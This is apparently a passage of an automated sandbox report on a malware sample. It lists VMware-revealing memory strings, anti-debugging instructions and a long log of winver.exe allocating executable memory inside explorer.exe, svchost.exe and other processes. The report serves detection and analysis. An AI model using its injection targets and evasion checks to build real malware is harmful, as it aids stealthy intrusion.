            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
            Source: SearchApp.exe, 0000000B.00000000.1855361847.0000024B55CC4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui218
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
            Source: svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Meld\Meld.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Sparx Systems\EA\EA.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MakeMKV\makemkv.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MirrorOp\MirrorOp.exeC:\Games\Counter-Strike WaRzOnE\CS16Launcher.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PDFBinder\PDFBinder.exe{6D809377-6AF0-444B-8957-A3773F02200E}\PureRef\PureRef.exeA97ECD55.KYOCERAPrintCenter_kqmhh0ktdt7dg!KYOCERAPrintCenter{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Meitu\XiuXiu\XiuXiu.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Zoiper5\Zoiper5.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MP3Gain\MP3GainGUI.exe{6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exeLenovoCorporation.LenovoSettings_4642shxvsv8s2!App10978
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Enterprise\Co*|vmware horizon client*|view5503
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5038
            Source: SearchApp.exe, 0000000B.00000003.1883649123.0000024B5CBD7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388-4BFC-874A
            Source: explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 377*|vmware workstation 15 player*|vmplayer6438
            Source: C:\Users\user\Desktop\java.exeAPI call chain: ExitProcess graph end nodegraph_0-3090
            Source: C:\Windows\SysWOW64\winver.exeAPI call chain: ExitProcess graph end nodegraph_2-2656
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeAPI call chain: ExitProcess graph end nodegraph_13-5409
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeAPI call chain: ExitProcess graph end nodegraph_13-5528
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeAPI call chain: ExitProcess graph end nodegraph_13-5893
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\winver.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02230005 rdtsc 0_2_02230005
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_00401000 mov eax, dword ptr fs:[00000030h]0_2_00401000
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02230C63 mov eax, dword ptr fs:[00000030h]0_2_02230C63
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_03390C3F mov eax, dword ptr fs:[00000030h]2_2_03390C3F
            Source: C:\Windows\explorer.exeCode function: 3_2_01340C3F mov eax, dword ptr fs:[00000030h]3_2_01340C3F
            Source: C:\Windows\explorer.exeCode function: 3_2_01370C3F mov eax, dword ptr fs:[00000030h]3_2_01370C3F
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0C3F mov eax, dword ptr fs:[00000030h]4_2_00AC0C3F
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910C3F mov eax, dword ptr fs:[00000030h]5_2_00910C3F
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0C3F mov eax, dword ptr fs:[00000030h]6_2_009A0C3F
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50C3F mov eax, dword ptr fs:[00000030h]7_2_00A50C3F
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40C3F mov eax, dword ptr fs:[00000030h]8_2_00D40C3F
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50C3F mov eax, dword ptr fs:[00000030h]9_2_00B50C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110C3F mov eax, dword ptr fs:[00000030h]10_2_00110C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_001C0C3F mov eax, dword ptr fs:[00000030h]13_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_02300C63 mov eax, dword ptr fs:[00000030h]13_2_02300C63
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0C3F mov eax, dword ptr fs:[00000030h]15_2_00AB0C3F
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_00290C3F mov eax, dword ptr fs:[00000030h]16_2_00290C3F
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 19_2_00580C3F mov eax, dword ptr fs:[00000030h]19_2_00580C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 20_2_001C0C3F mov eax, dword ptr fs:[00000030h]20_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 20_2_022A0C63 mov eax, dword ptr fs:[00000030h]20_2_022A0C63
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_003D0C3F mov eax, dword ptr fs:[00000030h]22_2_003D0C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_00900C3F mov eax, dword ptr fs:[00000030h]23_2_00900C3F
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_00180C3F mov eax, dword ptr fs:[00000030h]24_2_00180C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_00190C3F mov eax, dword ptr fs:[00000030h]26_2_00190C3F
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_00010C3F mov eax, dword ptr fs:[00000030h]28_2_00010C3F
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_000D0C3F mov eax, dword ptr fs:[00000030h]29_2_000D0C3F
            Source: C:\Windows\System32\dllhost.exeCode function: 30_2_00260C3F mov eax, dword ptr fs:[00000030h]30_2_00260C3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 31_2_04D80C3F mov eax, dword ptr fs:[00000030h]31_2_04D80C3F
            Source: C:\Windows\System32\conhost.exeCode function: 32_2_00880C3F mov eax, dword ptr fs:[00000030h]32_2_00880C3F
            Source: C:\Windows\System32\conhost.exeCode function: 33_2_00900C3F mov eax, dword ptr fs:[00000030h]33_2_00900C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 35_2_00890C3F mov eax, dword ptr fs:[00000030h]35_2_00890C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 36_2_00030C3F mov eax, dword ptr fs:[00000030h]36_2_00030C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 37_2_01530C3F mov eax, dword ptr fs:[00000030h]37_2_01530C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 38_2_02770C3F mov eax, dword ptr fs:[00000030h]38_2_02770C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 39_2_00B80C3F mov eax, dword ptr fs:[00000030h]39_2_00B80C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 40_2_008B0C3F mov eax, dword ptr fs:[00000030h]40_2_008B0C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 41_2_00B50C3F mov eax, dword ptr fs:[00000030h]41_2_00B50C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 42_2_02EB0C3F mov eax, dword ptr fs:[00000030h]42_2_02EB0C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 43_2_02D10C3F mov eax, dword ptr fs:[00000030h]43_2_02D10C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 44_2_02B40C3F mov eax, dword ptr fs:[00000030h]44_2_02B40C3F
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 45_2_02E20C3F mov eax, dword ptr fs:[00000030h]45_2_02E20C3F

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: 1340000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: 1370000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 260000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SysWOW64\cscript.exe base: 4D80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\conhost.exe base: 880000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\conhost.exe base: 900000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 890000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1530000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2770000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 8B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2E20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: C40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1120000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 3070000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 14D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1610000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2C90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 660000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 14B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1010000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: D90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 930000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 2360000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 970000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1050000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 7B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 1020000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 9C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 850000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: FC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe base: 20E0000 protect: page execute and read and writeJump to behavior
